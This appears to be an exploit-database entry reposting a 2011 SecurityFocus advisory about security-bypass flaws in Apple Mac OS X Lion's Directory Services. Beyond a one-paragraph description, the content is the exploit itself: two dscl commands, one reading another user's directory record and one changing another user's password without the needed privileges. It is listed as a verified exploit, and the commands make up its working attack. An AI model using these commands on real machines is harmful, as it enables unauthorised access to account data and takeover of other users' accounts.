Apple Mac OSX (Lion) - Directory Services Security Bypass



EKU-ID: 40707 CVE: OSVDB-ID:
Author: Defence in Depth Published: 2011-09-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/49676/info

Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities.

Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges.

$ dscl localhost -read /Search/Users/bob

$ dscl localhost -passwd /Search/Users/<username>